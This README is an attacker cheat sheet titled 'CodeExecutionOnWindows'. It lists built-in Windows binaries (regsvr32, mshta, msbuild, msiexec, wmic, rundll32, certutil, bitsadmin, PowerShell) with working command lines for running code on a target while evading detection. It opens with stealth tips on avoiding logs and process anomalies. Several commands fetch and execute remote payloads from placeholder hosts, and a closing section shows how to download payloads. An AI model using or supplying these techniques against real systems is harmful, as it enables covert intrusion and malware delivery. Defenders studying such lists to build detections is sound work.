└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # CodeExecutionOnWindows 2 | 3 | As an attacker often your aim is to execute code on a target system while simultaneously avoiding detection. 4 | Luckily Windows provides many built in tools to help you execute code while leaving very little evidence behind. 5 | 6 | A list of ways to execute code, including examples, are shown below. Note that UAC bypasses and DLL hijacking will not be included as these are covered elsewhere. 7 | 8 | Also a much more comprehensive list can be found here - https://github.com/api0cradle/LOLBAS 9 | 10 | #### General tips: 11 | 12 | To remain hidden ideally you want to: 13 | 14 | - Avoid creating new processes/network connections 15 | - Avoid creating anomalous parent/child relationships 16 | - Avoid creating/modifying files/registry entries 17 | - Avoid creating memory anomalies 18 | - Avoid leaving evidence in log files 19 | 20 | If you are going to drop files, then drop utilities to help run code as opposed to dropping the payload itself. 21 | 22 | #### References: 23 | 24 | Microsoft command line reference: 25 | https://technet.microsoft.com/en-us/library/cc772390(v=ws.11).aspx 26 | 27 | UAC Bypasses: 28 | https://github.com/hfiref0x/UACME 29 | 30 | 31 | ### Code Execution Techniques: 32 | 33 | - appsyncvpublishing.exe 34 | - Description: This utility supports the ability to execute powershell making it an excellent alternative to Powershell.exe. 35 | - Example: SyncAppvPublishingServer.exe "n;calc" 36 | 37 | - control.exe 38 | - Description: The control panel feature within Windows supports the execution of arbitrary DLLs as demonstrated in the shadowbrokers release. (https://www.dearbytes.com/blog/playing-around-with-nsa-hacking-tools/) 39 | - Example: control.exe payload.dll 40 | 41 | - csc.exe 42 | - Description: The .NET compiler can be used to compile a c# payload locally that can then be executed. 43 | - Example: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe payload.cs 44 | - Example payload.cs: public class x{public static void Main(){System.Diagnostics.Process.Start("calc");}} 45 | 46 | - cscript.exe/wscript.exe 47 | - Description: Windows script engines that support both VBS and JScript execution. CScript is the console version, WScript is the Window version. Neither version supports scripts being supplied on the command line, instead a file must be created containing the script or a funky bat file wrapper. 48 | - Example: cscript.exe test.vbs (where test.vbs contains WScript.Echo "test") 49 | 50 | - forfiles.exe 51 | - Description: Forfiles supports the ability to execute commands and seems to be equivalent to cmd. 52 | - Example: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe 53 | 54 | - msbuild.exe 55 | - Description - Microsoft's build utility where you can supply an inline build task to execute code (https://msdn.microsoft.com/en-us/library/dd722601.aspx) 56 | - Example: C:\Windows\Microsoft.NET\Framework\v2.0.50727\msbuild.exe \\server\payload 57 | 58 | - msiexec.exe 59 | - Description - The Windows installer typically used to install new software or patches. It be used to download and execute a remote payload. 60 | - Example: msiexec /i http://server/package.msi 61 | - Example: msiexec /y payload.dll 62 | - Example: msiexec /z payload.dll 63 | 64 | - mshta.exe 65 | - Description: MSHTA can be used to execute HTA files (containing scripts) or directly execute VBScript/JScript from the command line. 66 | - Example: mshta bad.hta 67 | - Example: mshta vbscript:Execute("MsgBox(""amessage"",64,""atitle"")(window.close)") 68 | - Example: mshta javascript:alert('test'); 69 | - Example HTA: \\ 74 | 75 | - powershell.exe 76 | - Description: The most well known and most useful attacker utility. Powershell can be operated in console mode, with commands provided on the command line or through passing a ps1 file containing commands. 77 | - Example: powershell -c calc 78 | - Example: powershell -exec bypass -File test.ps1 79 | 80 | - regsvr32.exe 81 | - Description: Command-line tool that registers dll files as command components in the registry. Notable for its use to bypass UAC and useful as it supports remote DLL retrieval with scrobj.dll. No arguments need to be supplied to regsvr32 if the dll exports the function DllRegisterServer. 82 | - Example: regsvr32 /s /n /u /i:[URL] scrobj.dll 83 | - Example: regsvr32 payload.dll 84 | 85 | - rundll32.exe 86 | - Description: Loads and runs DLLs. Three parameters are typically used, the DLL to be executed, the function within the DLL to call and any arguments. 87 | - Example: rundll32 SHELL32.DLL,ShellExec_RunDLL "calc" 88 | - Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('test'); 89 | 90 | - winrm.exe 91 | - Description: WinRM, or Windows Remote Management provides the ability to remotely execute wmi commands. The winrm service is disabled by default but can be enabled. 92 | - Example: winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} 93 | 94 | - wmic.exe 95 | - Description: Command line tool for WMI. 96 | - Example: wmic process call create "cmd.exe /c calc" 97 | - Example: wmic /node:[targetIPaddr] /user:[admin] process call create "cmd.exe /c [command]" 98 | - Example: wmic os get /format:"https://server/payload.xsl" 99 | 100 | ### Download Techniques: 101 | 102 | - certutil.exe 103 | - Description: Allows you to download a payload. 104 | - Example: certutil -ping [URL] 105 | - Example: certutil -urlcache -split -f [URL] [output-file] 106 | 107 | - bitsadmin.exe 108 | - Description: Allows you to download a payload. 109 | - Example: bitsadmin /transfer [job-name] /download /priority normal [URL-to-payload] [output-path] 110 | 111 | - powershell.exe 112 | - Description: Allows you to download a payload. 113 | - Example: powershell -c "(New-Object System.Net.WebClient).DownloadString('https://google.com')" 114 | 115 | --------------------------------------------------------------------------------